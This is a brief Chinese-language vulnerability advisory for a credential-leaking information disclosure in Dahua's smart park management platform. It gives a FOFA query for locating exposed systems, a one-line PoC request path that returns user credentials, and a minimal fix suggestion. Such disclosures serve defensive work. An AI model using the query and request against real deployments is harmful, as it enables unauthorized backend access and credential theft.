Nx01 产品简介
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
Nx02 漏洞描述
大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。
Nx03 产品主页
fofa-query: app.name="Dahua 大华 智慧园区管理平台"
Nx04 漏洞复现
POC:
/admin/user_getUserInfoByUserName.action?userName=system
Nx05 修复建议
建议联系软件厂商进行处理。